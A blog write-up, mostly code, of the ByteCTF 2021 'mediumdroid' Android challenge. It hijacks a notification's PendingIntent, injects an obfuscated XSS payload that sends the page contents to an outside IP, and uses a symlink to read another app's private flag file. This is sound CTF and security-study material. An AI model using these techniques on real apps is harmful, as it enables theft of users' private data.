ha1vk's blog
0%

bytectf2021_mediumdroid

发表于 分类于

PendingIntent使用了空的Intent,因此我们可以在其他APP中劫持PendingIntent,任意修改Intent的action,实现广播

与easydroid的思路类似,我们利用PendingIntent发送com.bytectf.SET_FLAG的广播,目的是在flag文件中注入一段XSS,然后利用软连接建立一个symlink.html,并加载,实现将整个flag文件反弹
MainActivity.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
package com.bytectf.pwnmediumdroid;

import android.app.Activity;
import android.app.PendingIntent;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.widget.EditText;
public class MainActivity extends Activity {
    EditText ed;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        /*ed = new EditText(this);
        setContentView(ed);
        launch("a");*/
        symlink();
        HijackNotification();
        Intent i = new Intent();
        i.setClassName("com.bytectf.mediumdroid","com.bytectf.mediumdroid.MainActivity");
        i.setData(Uri.parse("http://www.ha1vktoutiao.com"));
        startActivity(i);
    }
    private void HijackNotification() {
        Thread t = new Thread(new Runnable() {
            @Override
            public void run() {
                while (MagicService.sbn == null) {
                    try {
                        Thread.sleep(10);
                    } catch (InterruptedException e) {
                        e.printStackTrace();
                    }
                }
                runOnUiThread(new Runnable() {
                    @Override
                    public void run() {
                        //获取程序的PendingIntent
                        PendingIntent pendingIntent = MagicService.sbn.getNotification().contentIntent;
                        Intent vunlnIntent = new Intent("com.bytectf.SET_FLAG");
                        vunlnIntent.setPackage("com.bytectf.mediumdroid");
                        vunlnIntent.putExtra("flag","x = '<img src=\"x\" onerror=\"eval(decodeURI(atob('bmV3JTIwSW1hZ2UoKS5zcmMlMjA9JTIwJTIyaHR0cDovLzE5Mi4zLjgxLjEwMi8/Y29va2llPSUyMiUyMCslMjB3aW5kb3cuYnRvYShlbmNvZGVVUkkoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJTIyaHRtbCUyMiklNUIwJTVELmlubmVySFRNTCkpOw==')))\">'");
                        Log.e("PendingIntent","okok");
                        try {
                            pendingIntent.send(MainActivity.this,0,vunlnIntent);
                            //sendBroadcast(vunlnIntent);
                            Log.e("PendingIntent","finish");
                        } catch (Exception e) {
                            Log.e("PendingIntent",e.toString());
                            e.printStackTrace();
                        }
                        Intent i = new Intent();
                        i.setClassName("com.bytectf.mediumdroid","com.bytectf.mediumdroid.MainActivity");
                        i.setData(Uri.parse("http://www.ha1vktoutiao.com/stage2.html"));
                        startActivity(i);
                    }
                });
            }
        });
        t.start();
    }
    private String symlink() {
        try {
            String root = getApplicationInfo().dataDir;
            String symlink = root + "/symlink.html";
            String flag = "/data/data/com.bytectf.mediumdroid/files/flag";
            Runtime.getRuntime().exec("rm " + symlink).waitFor();
            Runtime.getRuntime().exec("ln -s " + flag + " " + symlink).waitFor();
            Runtime.getRuntime().exec("chmod -R 777 " + root).waitFor();
            return symlink;
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }
    private void launch(String url) {
        Intent extra = new Intent();
        extra.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
        extra.setClassName("com.bytectf.mediumdroid", "com.bytectf.mediumdroid.TestActivity");
        extra.putExtra("url","http://www.ha1vktoutiao.com/notify.html");
        String url_str = extra.toUri(Intent.URI_INTENT_SCHEME);
        ed.setText(url_str);
    }
}

MagicService.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
package com.bytectf.pwnmediumdroid;
import android.app.Notification;
import android.os.Bundle;
import android.service.notification.NotificationListenerService;
import android.service.notification.StatusBarNotification;
import android.util.Log;
public class MagicService extends NotificationListenerService {
    public static StatusBarNotification sbn = null;
    @Override
    public void onNotificationPosted(StatusBarNotification sbn) {
        if (this.sbn == null) {
            Bundle extras = sbn.getNotification().extras;
            // 获取接收消息APP的包名
            String notificationPkg = sbn.getPackageName();
            // 获取接收消息的抬头
            String notificationTitle = extras.getString(Notification.EXTRA_TITLE);
            // 获取接收消息的内容
            String notificationText = extras.getString(Notification.EXTRA_TEXT);
            if (notificationTitle != null && notificationText != null && notificationTitle.equals("PWN") && notificationText.equals("ha1vk")) {
                this.sbn = sbn;
                Log.i("NotificationMonitor", "Notification posted");
            }
        }
    }
    @Override
    public void onNotificationRemoved(StatusBarNotification sbn) {
        Log.i("NotificationMonitor","Notification removed");
    }
}

AndroidManifest.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.bytectf.pwnmediumdroid">
    <uses-permission android:name="android.permission.INTERNET" />
    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true">
        <activity
            android:name=".MainActivity"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <service android:name=".MagicService"
            android:label="@string/service_name"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService" />
            </intent-filter>
        </service>
    </application>
</manifest>

服务器上的index.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>PWN</title>
</head>
<body>
<script>
function getflag() {
   window.location = "intent:#Intent;launchFlags=0x10008000;component=com.bytectf.mediumdroid/.TestActivity;S.url=http%3A%2F%2Fwww.ha1vktoutiao.com%2Fnotify.html;end";
}
setTimeout("getflag()",5000);
</script>
</body>
</html>

notify.html打开通知

1
2
3
4
5
6
7
8
9
10
11
12
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>NOTIFY</title>
</head>
<body>
<script>
jsi.Te3t("PWN","ha1vk");
</script>
</body>
</html>

stage2.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>STAGE2</title>
</head>
<body>
<script>
function getflag() {
   window.location = "intent:#Intent;launchFlags=0x10008000;component=com.bytectf.mediumdroid/.TestActivity;S.url=file%3A%2F%2F%2Fdata%2Fuser%2F0%2Fcom.bytectf.pwnmediumdroid%2Fsymlink.html;end";
}
setTimeout("getflag()",10000);
</script>
</body>
</html>